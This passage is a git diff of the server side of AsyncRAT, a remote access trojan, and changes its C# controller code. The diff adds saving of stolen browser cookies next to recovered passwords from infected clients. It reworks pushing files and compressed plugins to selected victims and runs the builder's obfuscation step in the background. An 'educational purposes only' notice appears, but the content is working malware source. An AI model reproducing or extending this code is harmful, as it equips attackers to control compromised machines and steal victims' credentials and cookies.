= new MsgPack(); - msgpack.ForcePathObject("Packet").AsString = "plugin"; - msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\SendFile.dll")); - - foreach (Clients client in GetSelectedClients()) + openFileDialog.Multiselect = true; + if (openFileDialog.ShowDialog() == DialogResult.OK) { - foreach (string file in openFileDialog.FileNames) + MsgPack packet = new MsgPack(); + packet.ForcePathObject("Packet").AsString = "sendFile"; + packet.ForcePathObject("Update").AsString = "false"; + + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Packet").AsString = "plugin"; + msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\SendFile.dll")); + + foreach (Clients client in GetSelectedClients()) { - await packet.ForcePathObject("File").LoadFileAsBytes(file); - packet.ForcePathObject("Extension").AsString = Path.GetExtension(file); - msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes()); - ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes()); + client.LV.ForeColor = Color.Red; + foreach (string file in openFileDialog.FileNames) + { + await Task.Run(() => + { + packet.ForcePathObject("File").SetAsBytes(Zip.Compress(File.ReadAllBytes(file))); + packet.ForcePathObject("Extension").AsString = Path.GetExtension(file); + msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes()); + }); + ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes()); + } } } } @@ -1050,27 +1057,30 @@ namespace Server } } - private async void UpdateToolStripMenuItem2_Click(object sender, EventArgs e) + private void UpdateToolStripMenuItem2_Click(object sender, EventArgs e) { try { - OpenFileDialog openFileDialog = new OpenFileDialog(); - if (openFileDialog.ShowDialog() == DialogResult.OK) + using (OpenFileDialog openFileDialog = new OpenFileDialog()) { - MsgPack packet = new MsgPack(); - packet.ForcePathObject("Packet").AsString = "sendFile"; - await packet.ForcePathObject("File").LoadFileAsBytes(openFileDialog.FileName); - packet.ForcePathObject("Extension").AsString = Path.GetExtension(openFileDialog.FileName); - packet.ForcePathObject("Update").AsString = "true"; - - MsgPack msgpack = new MsgPack(); - msgpack.ForcePathObject("Packet").AsString = "plugin"; - msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\SendFile.dll")); - msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes()); - - foreach (Clients client in GetSelectedClients()) + if (openFileDialog.ShowDialog() == DialogResult.OK) { - ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes()); + MsgPack packet = new MsgPack(); + packet.ForcePathObject("Packet").AsString = "sendFile"; + packet.ForcePathObject("File").SetAsBytes(Zip.Compress(File.ReadAllBytes(openFileDialog.FileName))); + packet.ForcePathObject("Extension").AsString = Path.GetExtension(openFileDialog.FileName); + packet.ForcePathObject("Update").AsString = "true"; + + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Packet").AsString = "plugin"; + msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\SendFile.dll")); + msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes()); + + foreach (Clients client in GetSelectedClients()) + { + client.LV.ForeColor = Color.Red; + ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes()); + } } } } diff --git a/AsyncRAT-C#/Server/Forms/FormAbout.Designer.cs b/AsyncRAT-C#/Server/Forms/FormAbout.Designer.cs index d32b896..1649386 100644 --- a/AsyncRAT-C#/Server/Forms/FormAbout.Designer.cs +++ b/AsyncRAT-C#/Server/Forms/FormAbout.Designer.cs @@ -44,9 +44,7 @@ this.richTextBox1.ShortcutsEnabled = false; this.richTextBox1.Size = new System.Drawing.Size(557, 210); this.richTextBox1.TabIndex = 0; - this.richTextBox1.Text = "\n │ Author : NYAN CAT\n │ Name : AsyncRAT © 2019\n │ C" + - "ontact : github.com/NYAN-x-CAT\n\n This program is distributed for educat" + - "ional purposes only.\n\n"; + this.richTextBox1.Text = resources.GetString("richTextBox1.Text"); this.richTextBox1.ZoomFactor = 1.1F; // // FormAbout diff --git a/AsyncRAT-C#/Server/Forms/FormAbout.resx b/AsyncRAT-C#/Server/Forms/FormAbout.resx index f4aca47..407f1e1 100644 --- a/AsyncRAT-C#/Server/Forms/FormAbout.resx +++ b/AsyncRAT-C#/Server/Forms/FormAbout.resx @@ -117,6 +117,16 @@ System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + │ Author NYAN CAT + │ Name AsyncRAT © 2019 + │ Page GitHub.com/NYAN-x-CAT + │ Twitter Twitter.com/NYAN_x_CAT + + This program is distributed for educational purposes only. + + diff --git a/AsyncRAT-C#/Server/Forms/FormBuilder.cs b/AsyncRAT-C#/Server/Forms/FormBuilder.cs index 38bb926..37cbdc5 100644 --- a/AsyncRAT-C#/Server/Forms/FormBuilder.cs +++ b/AsyncRAT-C#/Server/Forms/FormBuilder.cs @@ -203,7 +203,10 @@ namespace Server.Forms if (chkObfu.Checked) { //EncryptString.DoEncrypt(asmDef); - Renaming.DoRenaming(asmDef); + await Task.Run(() => + { + Renaming.DoRenaming(asmDef); + }); } asmDef.Write(saveFileDialog1.FileName); asmDef.Dispose(); diff --git a/AsyncRAT-C#/Server/Forms/FormSendFileToMemory.cs b/AsyncRAT-C#/Server/Forms/FormSendFileToMemory.cs index 63bedca..64ee7cf 100644 --- a/AsyncRAT-C#/Server/Forms/FormSendFileToMemory.cs +++ b/AsyncRAT-C#/Server/Forms/FormSendFileToMemory.cs @@ -45,38 +45,37 @@ namespace Server private void button1_Click(object sender, EventArgs e) { - OpenFileDialog O = new OpenFileDialog() + using (OpenFileDialog O = new OpenFileDialog()) { - Filter = "(*.exe)|*.exe" - }; - if (O.ShowDialog() == DialogResult.OK) - { - toolStripStatusLabel1.Text = Path.GetFileName(O.FileName); - toolStripStatusLabel1.Tag = O.FileName; - toolStripStatusLabel1.ForeColor = Color.Green; - IsOK = true; - if (comboBox1.SelectedIndex == 0) + O.Filter = "(*.exe)|*.exe"; + if (O.ShowDialog() == DialogResult.OK) { - try + toolStripStatusLabel1.Text = Path.GetFileName(O.FileName); + toolStripStatusLabel1.Tag = O.FileName; + toolStripStatusLabel1.ForeColor = Color.Green; + IsOK = true; + if (comboBox1.SelectedIndex == 0) { - new ReferenceLoader().AppDomainSetup(O.FileName); - IsOK = true; - } - catch - { - toolStripStatusLabel1.ForeColor = Color.Red; - toolStripStatusLabel1.Text += " Invalid!"; - IsOK = false; + try + { + new ReferenceLoader().AppDomainSetup(O.FileName); + IsOK = true; + } + catch + { + toolStripStatusLabel1.ForeColor = Color.Red; + toolStripStatusLabel1.Text += " Invalid!"; + IsOK = false; + } } } + else + { + toolStripStatusLabel1.Text = ""; + toolStripStatusLabel1.ForeColor = Color.Black; + IsOK = true; + } } - else - { - toolStripStatusLabel1.Text = ""; - toolStripStatusLabel1.ForeColor = Color.Black; - IsOK = true; - } - } private void button2_Click(object sender, EventArgs e) diff --git a/AsyncRAT-C#/Server/Handle Packet/HandleListView.cs b/AsyncRAT-C#/Server/Handle Packet/HandleListView.cs index cf2f77b..e0403df 100644 --- a/AsyncRAT-C#/Server/Handle Packet/HandleListView.cs +++ b/AsyncRAT-C#/Server/Handle Packet/HandleListView.cs @@ -63,7 +63,7 @@ namespace Server.Handle_Packet try { lock (Settings.LockListviewClients) - if (client != null && client.LV != null) + if (client.LV != null) client.LV.ForeColor = Color.Empty; } catch { } diff --git a/AsyncRAT-C#/Server/Handle Packet/HandleRecovery.cs b/AsyncRAT-C#/Server/Handle Packet/HandleRecovery.cs index 3e382a6..9731f5b 100644 --- a/AsyncRAT-C#/Server/Handle Packet/HandleRecovery.cs +++ b/AsyncRAT-C#/Server/Handle Packet/HandleRecovery.cs @@ -19,21 +19,25 @@ namespace Server.Handle_Packet { string fullPath = Path.Combine(Application.StartupPath, "ClientsFolder\\" + unpack_msgpack.ForcePathObject("Hwid").AsString + "\\Recovery"); string pass = unpack_msgpack.ForcePathObject("Password").AsString; - //string cookies = unpack_msgpack.ForcePathObject("Cookies").AsString; - if (!string.IsNullOrWhiteSpace(pass))// || !string.IsNullOrWhiteSpace(cookies)) + string cookies = unpack_msgpack.ForcePathObject("Cookies").AsString; + if (!string.IsNullOrWhiteSpace(pass) || !string.IsNullOrWhiteSpace(cookies)) { if (!Directory.Exists(fullPath)) Directory.CreateDirectory(fullPath); File.WriteAllText(fullPath + "\\Password_" + DateTime.Now.ToString("MM-dd-yyyy HH;mm;ss") + ".txt", pass.Replace("\n", Environment.NewLine)); - //File.WriteAllText(fullPath + "\\Cookies_" + DateTime.Now.ToString("MM-dd-yyyy HH;mm;ss") + ".txt", cookies.Replace("\n", Environment.NewLine)); + File.WriteAllText(fullPath + "\\Cookies_" + DateTime.Now.ToString("MM-dd-yyyy HH;mm;ss") + ".txt", cookies); new HandleLogs().Addmsg($"Client {client.TcpClient.RemoteEndPoint.ToString().Split(':')[0]} recovered passwords successfully", Color.Purple); } else { new HandleLogs().Addmsg($"Client {client.TcpClient.RemoteEndPoint.ToString().Split(':')[0]} has no passwords", Color.MediumPurple); } + client?.Disconnected(); + } + catch (Exception ex) + { + new HandleLogs().Addmsg(ex.Message, Color.Red); } - catch { } } } } \ No newline at end of file diff --git a/AsyncRAT-C#/Server/Handle Packet/Packet.cs b/AsyncRAT-C#/Server/Handle Packet/Packet.cs index 9259968..e9cd878 100644 --- a/AsyncRAT-C#/Server/Handle Packet/Packet.cs +++ b/AsyncRAT-C#/Server/Handle Packet/Packet.cs @@ -8,14 +8,13 @@ namespace Server.Handle_Packet { public class Packet { - public void Read(object Obj) + public Clients client; + public byte[] data; + + public void Read(object o) { - Clients client = null; try { - object[] array = Obj as object[]; - byte[] data = (byte[])array[0]; - client = (Clients)array[1]; MsgPack unpack_msgpack = new MsgPack(); unpack_msgpack.DecodeFromBytes(data); diff --git a/AsyncRAT-C#/Server/Helper/Methods.cs b/AsyncRAT-C#/Server/Helper/Methods.cs index b33381e..315a519 100644 --- a/AsyncRAT-C#/Server/Helper/Methods.cs +++ b/AsyncRAT-C#/Server/Helper/Methods.cs @@ -2,6 +2,7 @@ using Server.Algorithm; using Server.Handle_Packet; using System; +using System.Diagnostics; using System.Drawing; using System.IO; using System.Text; @@ -49,7 +50,11 @@ namespace Server.Helper { foreach (string plugin in Directory.GetFiles("Plugins", "*.dll", SearchOption.TopDirectoryOnly)) { - Settings.Plugins.Add(GetHash.GetChecksum(plugin), Strings.StrReverse(Convert.ToBase64String(File.ReadAllBytes(plugin)))); + Settings.Plugins.Add(GetHash.GetChecksum(plugin), Strings.StrReverse(Convert.ToBase64String(Zip.Compress(File.ReadAllBytes(plugin))))); +#if DEBUG + byte[] plg = Zip.Compress(File.ReadAllBytes(plugin)); + Debug.WriteLine($"{plugin} : {BytesToString(plg.Length)}"); +#endif } } catch (Exception ex) diff --git a/AsyncRAT-C#/Server/ILMerge.props b/AsyncRAT-C#/Server/ILMerge.props index aaadb12..b0fc9d2 100644 --- a/AsyncRAT-C#/Server/ILMerge.props +++ b/AsyncRAT-C#/Server/ILMerge.props @@ -41,7 +41,7 @@ - + false diff --git a/AsyncRAT-C#/Server/MessagePack/MsgPack.cs b/AsyncRAT-C#/Server/MessagePack/MsgPack.cs index b855384..59d7747 100644 --- a/AsyncRAT-C#/Server/MessagePack/MsgPack.cs +++ b/AsyncRAT-C#/Server/MessagePack/MsgPack.cs @@ -10,6 +10,7 @@ * * Credit -> github.com/ymofen/SimpleMsgPack.Net */ +using Server.Algorithm; using System; using System.Collections; using System.Collections.Generic; @@ -498,6 +499,7 @@ namespace Server.MessagePack { using (MemoryStream ms = new MemoryStream()) { + bytes = Zip.Decompress(bytes); ms.Write(bytes, 0, bytes.Length); ms.Position = 0; DecodeFromStream(ms); @@ -839,7 +841,7 @@ namespace Server.MessagePack byte[] r = new byte[ms.Length]; ms.Position = 0; ms.Read(r, 0, (int)ms.Length); - return r; + return Zip.Compress(r); } } diff --git a/AsyncRAT-C#/Server/Server.csproj b/AsyncRAT-C#/Server/Server.csproj index 7c81798..92ac80e 100644 --- a/AsyncRAT-C#/Server/Server.csproj +++ b/AsyncRAT-C#/Server/Server.csproj @@ -8,7 +8,7 @@ {7767C300-5FD5-4A5D-9D4C-59559CCE48A3} WinExe Server - AsyncRAT-Sharp + AsyncRAT v4.6 512 true @@ -81,6 +81,7 @@ + Form diff --git a/AsyncRAT-C#/Server/Settings.cs b/AsyncRAT-C#/Server/Settings.cs index 52e96ff..520f957 100644 --- a/AsyncRAT-C#/Server/Settings.cs +++ b/AsyncRAT-C#/Server/Settings.cs @@ -15,7 +15,7 @@ namespace Server public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12"; public static X509Certificate2 ServerCertificate; - public static readonly string Version = "AsyncRAT 0.5.4"; + public static readonly string Version = "AsyncRAT 0.5.4B"; public static object LockListviewClients = new object(); public static object LockListviewLogs = new object(); public static object LockListviewThumb = new object();